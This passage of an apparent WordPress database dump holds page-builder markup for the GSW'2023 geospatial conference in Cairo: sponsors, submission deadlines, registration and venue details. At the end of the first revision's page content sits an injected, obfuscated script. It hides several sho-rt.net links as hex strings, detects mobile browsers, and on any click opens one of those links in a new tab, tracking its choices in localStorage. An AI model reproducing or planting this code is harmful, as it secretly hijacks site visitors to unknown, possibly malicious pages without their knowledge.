link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\">\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-04-22 12:38:29','2023-04-22 12:38:29','',3066,'https://gsw2023.com/?p=4090',0,'revision','',0),
(4091,1,'2023-04-22 12:39:58','2023-04-22 12:39:58','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"5\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\" css=\".vc_custom_1682167094573{margin-top: -25px !important;}\"][vc_column_text css=\".vc_custom_1682167065507{margin-top: -50px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper submission (Annals): April 30, 2023 <span style=\"text-decoration: line-through;\">March 31, 2023</span> (hard deadline, no extension)</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Full paper Author notification: May 21, 2023 <span style=\"text-decoration: line-through;\">May 1, 2023</span></strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract submission (Archives):            .</strong></p>\n<p><strong><del>April 15, 2023</del> ,</strong></p>\n<p><strong> May 15, 2023  (hard deadline, no extension)</strong><br />\n<strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification:</strong></p>\n<p><strong><del>May 15, 2023</del>, May 21, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fwww.conftool.com%2Fgsw2023|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1675484507520{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]SUBMIT YOUR PAPER NOW[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h5><span style=\"font-size: 14pt; color: #ffffff;\"><strong><a style=\"color: #ffffff;\" href=\"https://www.ihg.com/redirect?path=hd&amp;brandCode=6C&amp;localeCode=en&amp;regionCode=1&amp;hotelCode=CROHA&amp;_PMID=99801505&amp;GPC=DY8&amp;cn=no&amp;viewfullsite=true\" target=\"_blank\" rel=\"noopener\">Conference Venue Special Rate Booking is Opened Now</a></strong></span></h5>\n<p>[/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665287063394{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1665182763974{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1675590910832{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo City stars Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" 